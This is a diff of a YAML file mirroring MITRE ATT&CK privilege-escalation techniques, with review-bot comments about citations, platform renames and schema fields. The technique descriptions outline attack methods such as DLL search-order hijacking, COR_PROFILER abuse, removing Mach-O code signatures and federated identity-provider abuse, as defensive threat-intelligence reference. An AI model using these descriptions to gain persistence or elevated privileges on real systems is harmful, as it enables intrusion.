Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15094,8 +15362,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15144,7 +15410,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15196,29 +15462,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
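Review bot: the rewritten description drops the paragraph on the deprecated `at` utility, including its cross-reference to T1053.002 and the caveat that `at.exe` cannot see tasks created with `schtasks` or the Control Panel. That caveat is a useful detection nuance (enumerating with `at` alone misses schtasks-created tasks), so if this is a sync from upstream ATT&CK rather than an editorial cut, the commit message should say so; if it is editorial, the sentence is worth keeping. Minor: the added text spells `Powershell` in lower camel case; if the text is mirrored from upstream leave it, otherwise `PowerShell`.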
@@ -15265,7 +15530,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15297,8 +15562,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
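Review bot: swapping the `twitter.com` URL for `x.com` and resetting the retrieval date to September 12, 2024 re-points the citation at a host where individual posts can be deleted or login-gated at the platform's discretion, so the reference becomes harder to verify over time. Consider pointing `url` at an archive.org snapshot of the post (or keeping the original `twitter.com` URL, which still redirects) and preserving the original retrieval date; the same applies to the `Tweet Registry Perms Weakness` reference for T1574.011 further down.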
@@ -15312,6 +15577,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
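Review bot: the new `Red Canary - Atomic Red Team` reference points at `blob/master/...`, which is a moving target; a citation with a fixed retrieval date should pin a commit (`blob/<commit-sha>/atomics/T1053.005/T1053.005.md`, placeholder) so the text retrieved on June 19, 2024 stays reproducible. Note also that this object now cites the repository that contains it, which is fine if it mirrors the upstream ATT&CK reference list but should not be introduced locally.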
@@ -15324,11 +15593,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -15394,7 +15666,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15483,7 +15754,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15571,7 +15841,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15656,7 +15925,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15688,7 +15956,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15711,11 +15979,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15773,9 +16040,8 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
@@ -15849,7 +16115,7 @@ privilege-escalation:
elevation_required: false
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15950,7 +16216,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15981,7 +16246,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16015,13 +16280,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16040,7 +16303,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -16054,7 +16316,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -16081,8 +16342,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16113,12 +16374,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16190,9 +16452,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16208,12 +16470,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16288,12 +16549,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16313,9 +16573,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16335,9 +16600,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
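Review bot: the description added in the previous hunk now discusses AWS IAM Identity Center and federating into all AWS Organization member accounts, yet the platform list here shrinks to `Windows` and `Identity Provider` (`Azure AD` and `SaaS` removed) with no `IaaS` entry. If this mirrors upstream ATT&CK's classification of IAM Identity Center as an identity provider, say so in the commit message; otherwise the platforms and the description disagree about where this technique applies.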
@@ -16354,6 +16618,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16387,7 +16655,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16543,31 +16810,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
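Review bot: most of this hunk, together with the two T1053.003 hunks that follow, is a key re-ordering rather than a content change: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and re-emitted lower in the object with identical values. That buries the real changes (`modified`, `x_mitre_version` 1.1 to 1.2, `x_mitre_attack_spec_version` 3.2.0, and the new `x_mitre_deprecated`, `revoked` and `x_mitre_remote_support` flags) under noise; if the generator can emit keys in a stable order, this diff shrinks to a handful of lines and is much easier to audit.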
@@ -16584,6 +16831,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16594,9 +16842,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16604,13 +16856,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
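Review bot: the `- spec_version: '2.1'` removal here (and the same removal in nearly every later hunk, e.g. T1098.003, T1547.012, T1574.001, T1055.003) drops the STIX object-level version field while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0; if this is a deliberate change in the generator's field set, the PR description should say so, since any consumer that validates these records as STIX 2.1 objects will now see entries without `spec_version`. The rest of the hunk is key reordering plus the added `type`, `id`, `created`, `revoked` and `external_references` keys, which look consistent with the `identifier: T1053.003` line that follows.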
@@ -16640,6 +16908,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16650,6 +16919,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16658,13 +16928,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
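Review bot: the platform list for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider` (with the 2.4 to 2.5 version bump); the same rename appears later for T1078.001 and T1548. Anything that groups or filters techniques by the old platform strings will silently stop matching these entries, so please confirm that every per-platform grouping derived from this file is regenerated with the new names in the same change rather than in a follow-up.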
@@ -16706,9 +16976,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16776,19 +17043,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16804,8 +17070,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16819,7 +17085,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16845,6 +17111,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
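Review bot: the new `Hexacorn DLL Hijacking` entry matches the `(Citation: Hexacorn DLL Hijacking)` key added to the T1574.001 description in the earlier hunk, so the citation resolves. Two small points while this reference list is being touched: the description uses a typographic apostrophe in `Beyond good ol’ Run key`, which differs from the plain ASCII used by the neighbouring entries, and the adjacent unchanged `Microsoft Security Advisory 2269637` entry reads `Microsoft. (, May 23).` with no year, which is worth fixing at the source rather than carrying forward.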
@@ -16872,12 +17142,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16903,7 +17172,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16945,7 +17214,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
